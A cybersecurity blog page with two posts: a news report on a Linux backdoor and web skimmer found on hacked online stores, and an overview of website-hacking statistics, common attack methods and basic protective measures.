Search This Blog

Showing posts with label Website Hacking. Show all posts

Threat Actors Deploy Linux Backdoor on Hacked E-Stores with Software Skimmer


Cybersecurity researchers have uncovered a new hacking strategy that deploys a Linux backdoor on hacked e-commerce servers and exfiltrates customers' personal information, including credit card details. 

According to Sansec researchers, the hackers started automated e-commerce attack probes, testing for dozens of vulnerabilities in e-commerce websites. As soon as one is spotted, the attackers use PHP-coded web skimmer to download and insert fake payment forms into the checkout pages that the hacked online business displays to clients. 

“We found that the attacker started with automated eCommerce attack probes, testing for dozens of weaknesses in common online store platforms. After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data,” the Sansec threat research team stated. 

The Golang-based malware, which was unearthed on the same site by Dutch cyber-security firm Sansec, was downloaded and executed on infiltrated servers as a linux_avp executable. Once deployed, it immediately removes itself from the disk and disguises itself as a "ps -ef" process that would be used to retrieve a list of presently active processes.

While examining the linux_avp backdoor, the researchers discovered that it waits for commands from a Beijing server on Alibaba’s network. Additionally, the malware can gain persistence by inserting a new crontab entry that would redownload the malicious payload from its command-and-control server and reinstall the backdoor if detected and removed or the server restarts. 

Unfortunately, this backdoor remains undetected by anti-malware engines on VirusTotal even though a sample was first uploaded more than one month ago, on October 8th. The uploader might be the linux_avp designer since it was submitted one day after researchers discovered it while examining the e-commerce site breach.

 “Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment test. This was just one day after the successful breach of our customer’s store. The person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation,” said researchers.

Here's A Quick Look Into Some Interesting Facts About Website Hacking


How many websites are hacked every day? How frequently do hackers attack? Are there any solutions to fix the vulnerabilities? Which are the most hacked websites? These are some basic questions that arise in the reader’s mind. So, in this article, you will get to know the latest statistics regarding website hacking.

Sadly, cyber-attacks are the harsh reality of today’s world and have become so rampant that it’s impossible to count the number of attacks. It requires thorough research, manpower, time, equipment’s and money to conduct a global study that reaches out to millions of people and organizations.

 Number of websites hacked in a year

You will be surprised to know that nearly 1.2 billion sites are running across the globe. It is such a large web that it is impossible to keep watch over. Google’s Safe Browsing tries to alert users about malicious websites and it currently conveys nearly 3 million warnings per day. Out of 1.2 billion sites, between 1-2% have some Indicator of Compromise (IoC) that indicates a website attack.

According to a recent study, nearly 66% of the organizations are not equipped to handle cyber-attacks nor with the financial or reputation damage of a security breach. Threat actors install the malware in sites and such websites get excludes by firms like Google every day.

Different methods of hacking the websites 

Threat actor generally uses 3 methods to hack the website: 

• Access control 

• Software vulnerabilities

• Third-party integrations

Access control indicates particularly the process of authentication and authorization, in simple terms how you log in. Login not only refers to your website’s login, but it also refers to the number of interconnected logins tied together behind the scenes. Threat actors generally use brute force attacks by guessing the possible username and password combinations to log in as the user. 

Software vulnerability, the most reliable method for hackers to breach security. Threat actors use Remote Code Execution (RCE) to hack the website and discover vulnerabilities in the website application code, web development framework, and operating system.

Threat actors also hack the website via third-party integration techniques. Threat actors exploit the vulnerability in the servers of third-party and use it as a doorway to exploit to gain access to your website. These can involve services that you use particularly with your website and its hosting. 

3 simple techniques to protect your website 

• Keep track of frequently compromised vulnerabilities. Every security patch will make it harder for hackers to target your website. 

• Use Web Application Firewall for limiting the exploitation of software vulnerabilities. This firewall also acts as a shield between web traffic and web patches.

• Take the guidance of certified security professionals who manages regular security audits.